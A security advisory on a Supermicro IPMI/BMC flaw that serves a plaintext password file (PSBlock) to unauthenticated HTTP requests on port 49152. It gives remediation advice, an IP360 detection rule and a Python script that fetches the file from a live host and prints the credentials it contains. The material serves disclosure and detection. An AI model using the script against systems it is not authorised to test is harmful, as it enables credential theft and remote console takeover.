VERT Alert - Supermicro IPMI/BMC Plaintext Password Disclosure

Vulnerability Description

Supermicro’s IPMI/BMC firmware exposes a service on TCP port 49152 from which a remote, unauthenticated attacker can retrieve the file PSBlock with a plain HTTP GET request. PSBlock is a plaintext password file containing IPMI usernames and passwords.

Exposure & Impact

An attacker could use the disclosed credentials to gain authenticated access via IPMI on vulnerable Supermicro systems. Supermicro IPMI allows remote graphical and text-based console access to a system, which gives an attacker a great deal of flexibility. Current reports indicate that nearly 32,000 vulnerable hosts are reachable from the Internet.

Remediation & Mitigation

The latest firmware offerings from Supermicro are not vulnerable; users who can flash their firmware should do so immediately.

The cari.net blog post referenced below describes a temporary mitigation for cases where flashing the firmware is not an option.

Detection

IP360

ASPL-568 will ship with detection for this vulnerability. In the meantime, customers who require immediate coverage can insert the following custom vulnerability rule and associate it with the HTTP application. Scans will need to be run with Enhanced App Scan enabled.

EXECUTE {
rule.SEND("GET /PSBlock HTTP/1.0\r\n\r\n")
rule.waitForData()
strHeaders = rule.buffer
rule.waitForData()
strPSBlock = rule.buffer
if 'admin' in strPSBlock:
    rule.STOP(True)
rule.STOP(False)
}

The rule sends a raw HTTP/1.0 request for /PSBlock, reads the response in two passes (the headers into strHeaders, then the body into strPSBlock), and reports the host as vulnerable only if the body contains the literal, case-sensitive string 'admin'. A host that returns PSBlock but has no account name containing that string is not flagged by this rule.
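For readers without IP360, the following added Python example (not Tripwire's or Supermicro's code) performs the same check stand-alone: it sends the GET /PSBlock request to TCP port 49152, parses the raw HTTP response, treats an HTTP 200 with a non-empty body as disclosure, and lists printable ASCII runs from the body in the manner of strings(1). The record layout of PSBlock is not documented on this page, so the string extraction is a heuristic rather than a parser; the function names, the 4-character minimum run length, and the two sample responses embedded below are constructed for illustration.

```python
import re
import socket

PSBLOCK_PORT = 49152  # TCP port of the affected service on Supermicro BMCs


def build_request(path="/PSBlock"):
    """Raw HTTP/1.0 request, identical to what the IP360 rule sends."""
    return f"GET {path} HTTP/1.0\r\n\r\n".encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers, body).

    Returns (None, {}, b"") when the bytes do not look like an HTTP response.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None, {}, b""
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return None, {}, b""
    try:
        status = int(parts[1])
    except ValueError:
        return None, {}, b""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def printable_runs(body, min_len=4):
    """strings(1)-style extraction of printable ASCII runs.

    Plaintext usernames and passwords stored in PSBlock surface here. This is a
    heuristic (assumption: min_len=4), not a parser for the PSBlock record format.
    """
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, body)]


def assess(raw):
    """Decide whether a raw response indicates PSBlock disclosure.

    An HTTP 200 with a non-empty body is treated as vulnerable; a 404 or a
    non-HTTP answer (e.g. from patched firmware or a closed service) is not.
    """
    status, _headers, body = parse_response(raw)
    vulnerable = status == 200 and len(body) > 0
    return {
        "vulnerable": vulnerable,
        "status": status,
        "strings": printable_runs(body) if vulnerable else [],
    }


def check_host(host, port=PSBLOCK_PORT, timeout=5.0):
    """Fetch /PSBlock from a live BMC. Network call: only run against systems
    you are authorized to test."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request())
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:  # HTTP/1.0 server closes the connection after the body
                break
            chunks.append(data)
    return assess(b"".join(chunks))


# Constructed sample responses (not captured from a real device).
SAMPLE_VULNERABLE = (
    b"HTTP/1.0 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
    b"\x00\x01ADMIN\x00\x00\x00\x00P@ssw0rd!\x00\x00\x00\x02operator\x00\x00hunter22\x00"
)
SAMPLE_PATCHED = b"HTTP/1.0 404 Not Found\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print(check_host(sys.argv[1]))
    else:
        for name, sample in (("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
            print(name, assess(sample))
```

Run with no arguments to see the two constructed samples evaluated offline, or with a BMC address as the first argument to test a live host. Because the verdict rests on the HTTP status and body length rather than on a specific account name, it does not share the IP360 rule's dependency on the string 'admin' appearing in the file.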

References

http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/